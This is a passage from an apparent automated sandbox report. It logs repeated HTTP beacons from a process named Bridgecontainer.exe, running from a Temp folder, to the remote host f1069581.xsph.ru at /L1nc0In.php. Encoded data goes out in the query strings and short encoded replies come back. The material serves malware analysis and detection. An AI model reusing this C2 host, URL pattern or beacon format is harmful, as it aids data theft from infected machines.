                Data Ascii: 9JiZ0ITNxkTZzMTZlJGZyYGO4cjZ3UGZyczNxEmY0cjMkJiOiEWNzQTMzYDNmlDZ4kTO2IzMjFmMzgzM0gTZ5IWZ5MGMiwiImF1b39UaKlnWYJVeahlW1JGMOVTWyUDbj5mSxkVM5UXYXRWMihkQ2p1VjlWSDF0SMNUSrlkavl2TFpVVWZVOzJmMKRXZW5UNZJTNsNmbKFTWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJtWSq9WaidUOpJGWsRVZX5UdahlS5R2VOZmYtxmbkdFe3JmMW5WSpF0ZDl2dpJlROZVSq9WaadlU2F1MspmYtZVej5mVqhlM1AnWzY1cjdUOspVeJdWSB92cJ1Gd5JWMsZGZyY1TMFDeollMslnWXFjQJp2bpp1V1YXZtZFdhhlUmJWbs5GZXh3diJjVulUaBd2QpdXaNRUSp9UaKpHZXx2aZZlS1klMGlHZX5kaRdVN2FGWShWWykzcYJTNwp1MWN3YHlDbalXSnlUQvNXSqdmMNRUQ15ERjRXSq9WaadlUxQ2Rs5mYtlzcYJTNwp1MWN3YHlDbalXSnlUQvNXSq1UeNR1Y11ERRl2TppEbahkVwEGWShmYGlTdhdFZxIGSCZnWXNWaJNUQLx0QKhWWywWeadVMCl0RoBzYtlzTJp2bpp1VxgGVuJVdadVNwR2R1YXWxkTdhdFZxIGSCZnWXNWaJNUQLx0QKJEVplkNJ1mVrJGMOBjYtZVdhhlU1JmMOZmYtxmbkdFe3JmMW5WSpF0ZDlGesNmM4hmWq9WaahlUoNGbSJkVuZFbYJTNwp1MWN3YHlDbalXSnlUQvNXTE9WaWVlV1FmV5UXYXRWMihkQ2p1VjlWSDF0SMNkS6pFWShGZG10ZadkVwE2V1YVSq9WaadVMoRlbslHZHVTMiJjTmJWbs5GZXh3diJjVulUaBd2QpdXaVFTVp9UaKxmWHlDRlhlSwImbWZXWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJhXTEVVaPlmS [TRUNCATED]
                Jan 2, 2025 05:17:06.085701942 CET224INData Raw: 70 6c 6b 4e 4a 31 6d 56 72 4a 47 4d 4f 68 6d 57 59 70 45 61 59 4a 54 4e 77 70 31 4d 57 4e 33 59 48 6c 44 62 61 6c 58 53 6e 6c 55 51 76 4e 58 53 74 52 58 65 69 46 7a 61 6e 52 6d 4d 57 39 55 53 71 39 57 61 61 64 56 4d 6f 52 56 62 31 59 58 59 58 52
                Data Ascii: plkNJ1mVrJGMOhmWYpEaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFzanRmMW9USq9WaadVMoRVb1YXYXRGbjxWO1F2VkFjYIJkdad1Ypl0QBtETDpkWUlWS2kUbWtmYw4UdiJDbupFWKZmYtxmbkdFe3JmMW5WSpF0ZDl2dpF2MKZ3VTJ0MaVFNp9UaKVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2Q
                Jan 2, 2025 05:17:06.085712910 CET224INData Raw: 70 6c 6b 4e 4a 31 6d 56 72 4a 47 4d 4f 68 6d 57 59 70 45 61 59 4a 54 4e 77 70 31 4d 57 4e 33 59 48 6c 44 62 61 6c 58 53 6e 6c 55 51 76 4e 58 53 74 52 58 65 69 46 7a 61 6e 52 6d 4d 57 39 55 53 71 39 57 61 61 64 56 4d 6f 52 56 62 31 59 58 59 58 52
                Data Ascii: plkNJ1mVrJGMOhmWYpEaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFzanRmMW9USq9WaadVMoRVb1YXYXRGbjxWO1F2VkFjYIJkdad1Ypl0QBtETDpkWUlWS2kUbWtmYw4UdiJDbupFWKZmYtxmbkdFe3JmMW5WSpF0ZDl2dpF2MKZ3VTJ0MaVFNp9UaKVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2Q
                Jan 2, 2025 05:17:06.171778917 CET876INData Raw: 70 64 58 61 68 4e 6a 53 32 64 31 55 43 4e 6a 57 56 52 54 61 50 6c 6d 53 31 51 32 52 73 70 47 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 55 61 30 73 53 57 54 6c 7a 59 51 64 55 4d 32 6c 56 65 31 73 6d 59 74 78
                Data Ascii: pdXahNjS2d1UCNjWVRTaPlmS1Q2RspGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUa0sSWTlzYQdUM2lVe1smYtxGdldkR0xkbkNDZ5lzYMFzd2M2MCBDZHd2KKJTM2lVe1smYtxGdldkR0xkbkNDZ5lzYMFzd2M2MCBDZHdmbQdlWsNWbndWWUd3ZidVO5pVaCxmYHpEaidEboRWbFdGTHJVdhVVM0kVVwcWZXl0ZadkVwk1VWlXW5JE
                Jan 2, 2025 05:17:06.470499039 CET2229OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNl [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:17:06.688663960 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:06 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.549705141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:17:06.477078915 CET827OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:17:07.152820110 CET158INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:07 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 0
                Connection: keep-alive
                Jan 2, 2025 05:17:07.158274889 CET1428OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&154d77d402106dff3d2a63610a8c9212=d1nIw4WSzh3RSZnUuJGcS5mY2p1RkVnVtJmdChlY25URYNmQYJGbSZEWjh3VZpWOHR1Y4ZVWwY0RSdnQYF1Y4FzY1lTbaNnRHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGO [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:17:07.370100021 CET158INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:07 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 0
                Connection: keep-alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.549706141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:17:11.700022936 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:17:12.373090982 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:12 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.549724141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:17:17.388451099 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:17:18.150692940 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:17 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.549757141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:17:23.168836117 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:17:23.844237089 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:23 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.549798141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:17:28.857894897 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:17:29.604166031 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:29 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.549829141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:17:34.621783972 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:17:35.325664043 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:35 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.549867141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
